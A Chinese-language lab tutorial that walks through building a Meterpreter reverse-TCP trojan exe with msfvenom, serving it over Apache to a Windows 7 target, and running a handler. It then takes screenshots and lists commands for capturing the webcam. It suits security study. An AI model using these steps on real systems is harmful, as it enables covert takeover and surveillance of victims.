此资料仅支持学习参考
实验原理: Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。
攻击者: kali-linux 192.168.31.130
靶机: Windows7 192.168.31.134
Windows后门:
在kali-linux上进行操作
生成exe木马文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.130 lport=5555 -f exe -o /var/www/html/payload.exe
(端口号自己随便写,/var/www/html这个是apache服务的路径,因为后面要使用apache服务把木马文件传输到靶机)
注:创建不成功,权限不够的话,可以先使用sudo su命令进入root模式再生成文件。
打开apache服务
service apache2 start
在Windows7上操作
打开浏览器,在地址栏输入攻击者ip 192.168.31.130
在kali-linux上进行操作
使用meterpreter
msfconsole
输入各种参数配置
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.130
set lport 5555
run
返回Windows7
运行下载的木马文件
双击下载的文件,点击运行,无图形界面产生
在kali-linux上进行操作
返回攻击机,这时已经建立会话
抓取Windows7屏幕
screenshot
屏幕已截取,文件保存在这个位置
结束会话
exit
meterpreter还有以下命令及参数:
webcam_list 查看摄像头
webcam_snap通过摄像头拍照
webcam _ stream 通过摄像头开启视频
-h :显示帮助。
-i :要使用的网络摄像头的索引号。
-p :JPEG 图像文件路径。默认 HOME /随机乱码名. jpeg 。